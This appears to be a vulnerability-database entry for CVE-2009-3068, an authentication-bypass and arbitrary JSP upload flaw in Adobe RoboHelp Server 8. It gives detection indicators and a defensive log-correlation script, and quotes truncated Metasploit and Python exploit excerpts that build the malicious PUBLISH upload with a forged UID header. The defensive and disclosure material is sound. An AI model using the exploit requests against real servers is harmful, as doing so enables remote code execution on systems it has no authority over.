CVE-2009-3068
Published 2009-09-04
Priority P1 · 80 · critical · 9.3 CVSS 2.0 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
EXPLOIT · EPSS 78.18% (99.5th percentile)
Unrestricted file upload vulnerability in the RoboHelpServer Servlet (robohelp/server) in Adobe RoboHelp Server 8 allows remote attackers to execute arbitrary code by uploading a Java Archive (.jsp) file during a PUBLISH action, then accessing it via a direct request to the file in the robohelp/robo/reserved/web directory under its sessionid subdirectory, as demonstrated by the vd_adobe module in VulnDisco Pack Professional 8.7 through 8.11.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | robohelp_server | — | — |
Detection & IOCs
Command: POST /robohelp/server?PUBLISH=<uid> with a multipart/form-data boundary and a UID header, uploading a .jsp file
- Detect POST requests to /robohelp/server with a PUBLISH parameter and a multipart/form-data content type containing a .jsp file upload; this is the exploitation upload stage.
- Detect GET requests to /robohelp/robo/reserved/web/<sessionid>/*.jsp; this is the second-stage payload execution request.
- Look for the custom HTTP header 'UID' in requests to /robohelp/server; this header is used by the exploit to bypass authentication.
- Inspect multipart/form-data uploads to /robohelp/server for files with Content-Type: application/x-java-archive and .jsp extensions; this combination indicates a malicious JSP trojan upload.
- Server responses containing a 'sessionid' header following a POST to /robohelp/server?PUBLISH= indicate a successful exploitation upload stage.
- The Metasploit module targets Apache-Coyote servers; correlate the Apache-Coyote server fingerprint with RoboHelp-specific URI patterns to prioritize alerting.
- The Metasploit module uses a randomly generated UID value and a random 8-character uppercase .jsp filename, so filename and UID header values vary per session; do not rely on static values like '1234' or 'test.jsp' for detection.
- The default target port is 8080, but the vulnerability is in the servlet path itself; detection rules should not be port-restricted, as deployments may vary.
- Exploitation requires two sequential HTTP requests: a POST to upload the JSP, followed by a GET to execute it. Single-request detection will miss the full attack chain.
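The two-request correlation described in the notes above can be run over web access logs. The following is an added example, not code from this page or from any of the cited sources; it assumes an access log in common log format, and the sample lines, function names and severity labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (not taken from a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [04/Sep/2009:10:00:01 +0000] "POST /robohelp/server?PUBLISH=83411 HTTP/1.1" 200 0
198.51.100.7 - - [04/Sep/2009:10:00:03 +0000] "GET /robohelp/robo/reserved/web/4127/QWERTYUI.jsp HTTP/1.1" 200 512
203.0.113.9 - - [04/Sep/2009:10:01:00 +0000] "GET /robohelp/robo/server/general/index.htm HTTP/1.1" 200 2048
203.0.113.20 - - [04/Sep/2009:10:02:00 +0000] "GET /RoboHelp/robo/reserved/web/77/a.JSP?x=1 HTTP/1.1" 404 0
192.0.2.4 - - [04/Sep/2009:10:03:00 +0000] "POST /robohelp/server?area=docs HTTP/1.1" 200 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
# Any .jsp directly under a per-session directory; matched case-insensitively
# and without fixed names, since session id and filename vary per attempt.
STAGED_JSP_RE = re.compile(r'^/robohelp/robo/reserved/web/[^/]+/[^/]+\.jsp$', re.I)

def classify(method, target):
    """Return 'upload', 'execute' or None for one request line."""
    parts = urlsplit(target)
    if method == 'POST' and parts.path.lower().rstrip('/') == '/robohelp/server':
        # Key on the PUBLISH parameter name; its value is random per session.
        keys = {k.upper() for k in parse_qs(parts.query, keep_blank_values=True)}
        return 'upload' if 'PUBLISH' in keys else None
    if method == 'GET' and STAGED_JSP_RE.match(parts.path):
        return 'execute'
    return None

def find_alerts(log_text):
    """Return (severity, client, target) tuples; 'chain' means the same
    client sent the PUBLISH POST earlier and then requested a staged .jsp."""
    uploaders = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, target = m.groups()
        stage = classify(method, target)
        if stage == 'upload':
            uploaders.add(client)
            alerts.append(('upload', client, target))
        elif stage == 'execute':
            severity = 'chain' if client in uploaders else 'execute-only'
            alerts.append((severity, client, target))
    return alerts
```

Access logs normally record neither the UID request header nor the multipart body, so the header and Content-Type checks from the list need a proxy, WAF or packet capture as their data source.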
No detection rules found.
Exploit-DB
Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)
exploitdb·2010-11-24
---
```ruby
##
# $Id: adobe_robohelper_authbypass.rb 11127 2010-11-24 19:35:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Adobe RoboHelp Server 8 Arbitrary File Upload and Execute',
      'Description' => %q{
        This module exploits an authentication bypass vulnerability which
        allows remote attackers to upload and execute arbitrary code.
      },
      'Author'
```
Exploit-DB
Adobe RoboHelp Server 8 - Authentication Bypass
exploitdb·2009-09-03
---
source: https://www.securityfocus.com/bid/36245/info
Adobe RoboHelp Server is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to upload and execute arbitrary code with SYSTEM-level privileges.
RoboHelp Server 8.0 is affected; other versions may also be vulnerable.
```python
b="-----------------------------111\r\n"
b+="Content-Disposition: form-data; name=\"filename\"; filename=\"test.jsp\"\r\n"
b+="Content-Type: application/x-java-archive\r\n\r\n"
b+=data # source code of our JSP trojan here
b+="\r\n"
b+="-----------------------------111--\r\n"
s="POST /robohelp/server?PUBLISH=1 HTTP/1.1\r\n"
s+="Host: %s:%d\r\n"%(host, port)
s+="User-Agent: Mozilla\r\n"
s+="UID: 1234\r\n"
s+="Content-Type: multipart/form-d
```
Metasploit
Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
metasploit
This module exploits an authentication bypass vulnerability which allows remote attackers to upload and execute arbitrary code.
No writeups or analysis indexed.
References
- http://blogs.adobe.com/psirt/2009/09/potential_robohelp_server_8_is.html
- http://intevydis.com/vd-list.shtml
- http://secunia.com/advisories/36467
- http://twitter.com/elegerov/statuses/3727947465
- http://twitter.com/elegerov/statuses/3737538715
- http://twitter.com/elegerov/statuses/3737725344
- http://www.adobe.com/support/security/bulletins/apsb09-14.html
- http://www.intevydis.com/blog/?p=26
- http://www.intevydis.com/blog/?p=69
- http://www.securityfocus.com/archive/1/506687/100/0/threaded
- http://www.securityfocus.com/bid/36245
- http://www.zerodayinitiative.com/advisories/ZDI-09-066
Published: 2009-09-04